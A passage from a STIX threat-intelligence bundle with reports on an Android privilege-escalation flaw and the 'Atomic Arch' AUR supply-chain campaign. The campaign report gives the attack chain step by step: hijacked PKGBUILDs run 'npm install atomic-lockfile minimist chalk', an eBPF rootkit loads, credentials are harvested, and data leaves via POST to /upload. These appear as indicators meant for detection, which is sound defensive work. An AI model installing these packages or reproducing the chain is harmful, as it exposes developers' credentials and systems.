      "published": "2026-06-14T08:56:21Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "solarwinds",
        "web-server",
        "cisa-kev"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28318"
        },
        {
          "source_name": "reference",
          "url": "https://www.solarwinds.com/trust-center/security-advisories/cve-2026-28318"
        },
        {
          "source_name": "reference",
          "url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4-hotfix-1_release_notes.htm#link7"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28318"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--62cf074b-3470-5d28-b0fd-cfcb8583af6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--03973603-d227-56fb-8aa8-889c8146a8cf",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--23f0f62e-b786-535c-ae1a-6ce3391e6be8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--03973603-d227-56fb-8aa8-889c8146a8cf",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--03973603-d227-56fb-8aa8-889c8146a8cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Android Framework Integer Overflow Vulnerability (CVE-2025-48595) Leading to Local Privilege Escalation",
      "description": "## Overview\n\nCVE-2025-48595 identifies a critical integer overflow vulnerability within the Android Framework that can be leveraged for local privilege escalation (LPE). This vulnerability, listed on CISA's Known Exploited Vulnerabilities (KEV) Catalog, allows a locally present attacker to achieve code execution with elevated privileges on Android devices. While the exact initial access vector is not specified, exploitation typically occurs once an attacker has established a presence on the device, such as through a malicious application or by chaining with another vulnerability. The vulnerability's presence in the core Android Framework means it impacts a broad range of Android versions, necessitating urgent patching as mandated by CISA BOD 22-01 by June 5, 2026. This allows attackers to gain deeper control over the device, bypass security mechanisms, and access sensitive user data.\n\n## Attack Chain\n\n1.  **Initial Access**: The attacker gains local access to the Android device, potentially via a malicious application, compromised user account, or a separate vulnerability leading to remote code execution.\n2.  **Vulnerability Trigger**: The attacker crafts a specific malicious input or sequence of operations that targets the vulnerable integer overflow in the Android Framework.\n3.  **Integer Overflow**: The crafted input causes an integer overflow condition within a privileged component of the Android Framework, leading to unexpected memory behavior.\n4.  **Memory Corruption**: The integer overflow results in memory corruption, which the attacker can manipulate to achieve arbitrary read/write primitives or control the program's execution flow.\n5.  **Code Injection and Execution**: The attacker injects and executes malicious code within the context of the vulnerable Android Framework component, often running with higher privileges.\n6.  **Privilege Escalation**: The executed code leverages the elevated privileges to access protected system resources, modify critical system configurations, or elevate its own process privileges.\n7.  **Post-Exploitation Activity**: The attacker might then install persistent backdoors, extract sensitive data from the device, or disable security features.\n8.  **Full Device Compromise**: The attacker gains full control over the compromised Android device, impacting user privacy and data integrity.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-48595 leads to local privilege escalation, granting an attacker significant control over the affected Android device. This can result in unauthorized access to sensitive user data (e.g., contacts, messages, photos, financial app data), installation of additional malware, bypassing of security controls, and complete compromise of the device's integrity. While specific victim counts or targeted sectors are not detailed, the widespread adoption of Android devices means this vulnerability poses a risk to a vast global user base across all sectors. The consequences can range from data theft and surveillance to financial fraud and device bricking.\n\n## Recommendation\n\n*   Apply the latest security updates released by Android or your device manufacturer that address CVE-2025-48595 as soon as they become available, referenced in `https://source.android.com/docs/security/bulletin/2026/2026-06-01`.\n*   Implement endpoint detection and response (EDR) solutions capable of monitoring Android process creation and file events to identify post-exploitation activities, correlating with the Sigma rules provided in this brief.\n*   Monitor for suspicious process spawning from system services or unexpected privilege escalation utility execution using the `Detect Suspicious Process Execution from Android System Services (CVE-2025-48595)` and `Detect Privilege Escalation Utilities Execution on Android (CVE-2025-48595)` Sigma rules.\n*   Deploy the `Detect Unauthorized Android System File Modification (CVE-2025-48595)` Sigma rule to identify anomalous modifications to critical system files or directories on Android devices.\n*   Ensure compliance with CISA Binding Operational Directive (BOD) 22-01 for all applicable systems and services.\n",
      "published": "2026-06-14T08:57:22Z",
      "labels": [
        "android",
        "privilege-escalation",
        "vulnerability-exploitation",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-48595"
        },
        {
          "source_name": "reference",
          "url": "https://source.android.com/docs/security/bulletin/2026/2026-06-01"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48595"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9db66709-fea6-5351-b015-c879240b35e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "package_name: atomic-lockfile",
      "pattern": "[x-ti-bot:package_name = 'atomic-lockfile']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:00:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8cc7a983-2fe0-59ec-9028-044bec91ecea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "indicator--9db66709-fea6-5351-b015-c879240b35e9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ccb71f50-b705-5373-8439-00ee70fa949b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "package_name: js-digest",
      "pattern": "[x-ti-bot:package_name = 'js-digest']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:00:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--87212990-54a1-5d77-8ac2-1bc46cd26497",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "indicator--ccb71f50-b705-5373-8439-00ee70fa949b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--21ffdf9e-5016-58d7-96a8-1856e1f62508",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "package_name: lockfile-js",
      "pattern": "[x-ti-bot:package_name = 'lockfile-js']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:00:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--41a28569-55ab-569e-84fb-bf4d7c5d0066",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "indicator--21ffdf9e-5016-58d7-96a8-1856e1f62508"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8c16d712-9e06-5d96-9812-176280f1767b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "command: npm install atomic-lockfile minimist chalk",
      "pattern": "[x-ti-bot:command = 'npm install atomic-lockfile minimist chalk']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:00:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0e4b4fd-408d-57ce-9eae-65c05fb4f8bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "indicator--8c16d712-9e06-5d96-9812-176280f1767b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e1735c54-731b-5d83-8306-893619ec152a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "filename: scales.bpf.c",
      "pattern": "[x-ti-bot:filename = 'scales.bpf.c']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:00:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53a9f34e-2219-5af5-9c4f-4f434132096f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "indicator--e1735c54-731b-5d83-8306-893619ec152a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a546d174-034e-5969-894b-2dea034a5eee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url_path: /upload",
      "pattern": "[x-ti-bot:url_path = '/upload']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:00:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--691d57ac-77d2-5373-8015-69c443a570fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "indicator--a546d174-034e-5969-894b-2dea034a5eee"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Supply Chain Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1195",
          "url": "https://attack.mitre.org/techniques/T1195"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ea15bbc-5d04-59bd-b687-bb4ff85de7c0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--547faf63-3242-5e61-8692-32106c95c9f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5dfcdfb5-6d1d-5382-8390-f886d5e8785d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Event Triggered Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1546",
          "url": "https://attack.mitre.org/techniques/T1546"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--13c98af5-f682-5aa7-91af-580ed0a55fc6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9c91c167-3e91-5b52-a9cc-bbca4d75f3cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hide Artifacts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1564",
          "url": "https://attack.mitre.org/techniques/T1564"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--345b9738-5bc9-558b-a89d-ce5c5feb7ed8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--05980bfb-70cd-563f-8ead-8f2a6abb0e0e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Debugger Evasion",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1622",
          "url": "https://attack.mitre.org/techniques/T1622"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--268a9020-25c1-5ab9-aaa2-7e9d5f1e6d9f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--05980bfb-70cd-563f-8ead-8f2a6abb0e0e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Credentials from Password Stores",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1555",
          "url": "https://attack.mitre.org/techniques/T1555"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8025220e-1dd9-5ff9-a09e-df6082fe6da7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee1d7160-bedf-5db2-bf03-22ef2f692970",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ca62418a-f084-5c83-ac66-3cb50dd2d2fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9a60cb86-a436-5f4c-8ad9-00c9a4e447fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b99a4973-efec-5597-9b96-98ddc45c6a3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Atomic Arch Campaign Leverages Orphaned AUR Packages for Linux Payload Deployment",
      "description": "## Overview\n\nSonatype researchers uncovered the Atomic Arch campaign, which began on June 11, 2026, targeting orphaned packages within the Arch User Repository (AUR). Threat actors are exploiting the AUR's stewardship process by adopting abandoned projects and subsequently modifying their PKGBUILD instructions. These modifications introduce a post-install script designed to install malicious npm packages, such as `atomic-lockfile`, `js-digest`, and `lockfile-js`. A second wave observed on June 12, 2026, also leveraged Bun-based installation paths. The installation of these malicious dependencies triggers the deployment of a sophisticated native Linux executable. This payload is engineered for credential harvesting (targeting GitHub, SSH, Vault, browser data, chat applications), employs eBPF for deep system stealth and privilege escalation, includes anti-debugging features, and possesses HTTP upload functionality for data exfiltration. The campaign is estimated to have affected approximately 1,500 packages, posing a significant supply chain risk where attackers inherit developer trust.\n\n## Attack Chain\n\n1.  **Initial Access \u0026 AUR Compromise**: Threat actors identify and gain stewardship of legitimate, but orphaned, packages within the Arch User Repository (AUR).\n2.  **PKGBUILD Modification**: The attackers modify the adopted AUR packages' `PKGBUILD` files to include a post-install script that executes package manager commands.\n3.  **Malicious Dependency Installation**: When a user installs or updates a compromised AUR package, the modified `PKGBUILD` triggers commands like `npm install atomic-lockfile minimist chalk` (or Bun equivalent) to retrieve and install malicious dependencies.\n4.  **Native Payload Execution**: The installed malicious npm/Bun dependency (e.g., `atomic-lockfile`) contains a `package.json` `preinstall` script that executes a bundled native Linux executable.\n5.  **Rootkit Deployment \u0026 Stealth**: The native Linux executable loads an eBPF program (e.g., `scales.bpf.c`) using `libbpf` APIs (`bpf_object__load`, `bpf_program__attach`, `bpf_map__pin`), enabling advanced process, file, and network hiding (rootkit functionality). It also implements anti-debugging techniques (`PTRACE_ATTACH`, `PTRACE_SEIZE`).\n6.  **Credential \u0026 Data Harvesting**: The deployed payload actively searches for and collects sensitive information, including GitHub credentials, SSH artifacts, HashiCorp Vault tokens, browser cookie databases, and data from messaging applications like Slack, Discord, Microsoft Teams, and Telegram.\n7.  **Data Exfiltration**: The harvested data is compressed and exfiltrated to attacker-controlled infrastructure via HTTP POST requests, specifically targeting endpoints such as `/upload`.\n\n## Impact\n\nThe Atomic Arch campaign has a severe impact on developer systems, treating affected hosts as fully compromised. The primary objective is extensive credential and sensitive data harvesting, which could lead to further unauthorized access to developer accounts, source code repositories, cloud infrastructure, and internal systems. The use of eBPF provides deep system stealth, making detection and removal challenging, potentially leading to long-term persistence. With an estimated 1,500 packages affected across multiple waves, this campaign represents a significant supply chain attack that erodes trust in public package repositories, exposing a wide range of organizations using Arch Linux and these packages to sophisticated Linux malware.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect malicious package installations and payload execution.\n*   Monitor `process_creation` logs for suspicious `npm` or `bun` commands installing known malicious packages like `atomic-lockfile`, `js-digest`, or `lockfile-js`, as detailed in the rule \"Detect Atomic Arch Malicious npm/Bun Package Installation\".\n*   Monitor `process_creation` logs for unusual executable launches from temporary or `node_modules` directories as a child of `npm` or `bun`, as described in the rule \"Detect Suspicious Executable Launched by Package Manager\".\n*   Enable and monitor `network_connection` logs for outbound HTTP POST requests to suspicious paths like `/upload` from unusual or non-browser processes, as outlined in the rule \"Detect Potential Exfiltration via HTTP POST /upload\".\n*   Review any Arch User Repository (AUR) packages installed within your environment, particularly those adopted around June 2026, for modified `PKGBUILD` files.\n",
      "published": "2026-06-14T09:00:24Z",
      "labels": [
        "supply-chain-attack",
        "npm",
        "bun",
        "linux",
        "malware",
        "credential-harvesting",
        "eBPF",
        "rootkit",
        "data-exfiltration"
      ],
      "object_refs": [
        "indicator--9db66709-fea6-5351-b015-c879240b35e9",
        "indicator--ccb71f50-b705-5373-8439-00ee70fa949b",
        "indicator--21ffdf9e-5016-58d7-96a8-1856e1f62508",
        "indicator--8c16d712-9e06-5d96-9812-176280f1767b",
        "indicator--e1735c54-731b-5d83-8306-893619ec152a",
        "indicator--a546d174-034e-5969-894b-2dea034a5eee",
        "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
        "attack-pattern--05980bfb-70cd-563f-8ead-8f2a6abb0e0e",
        "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--60a67c76-b6ed-5e6e-9547-6333142bd2e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: www.jsonkeeper.com",
      "pattern": "[domain-name:value = 'www.jsonkeeper.com']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:03:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ab2f8893-cdb2-5cdc-a3cd-3312dee9c052",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f331634c-122b-5715-b25c-f4607e011caa",
      "target_ref": "indicator--60a67c76-b6ed-5e6e-9547-6333142bd2e3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ffb37d6-ea5d-5755-acc1-10185307f1e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f331634c-122b-5715-b25c-f4607e011caa",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91fcd7aa-e73c-51f5-b7ef-9d0e3c13c268",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f331634c-122b-5715-b25c-f4607e011caa",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7a3a6a6f-6027-5d4c-bfed-f4d8bef5fffe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f331634c-122b-5715-b25c-f4607e011caa",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--10318f11-d560-5cad-946c-567c5918f5ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f331634c-122b-5715-b25c-f4607e011caa",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hide Artifacts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1564",
          "url": "https://attack.mitre.org/techniques/T1564"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25e4f73e-8f70-52dd-b87c-aa37bcaaa7ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f331634c-122b-5715-b25c-f4607e011caa",
      "target_ref": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
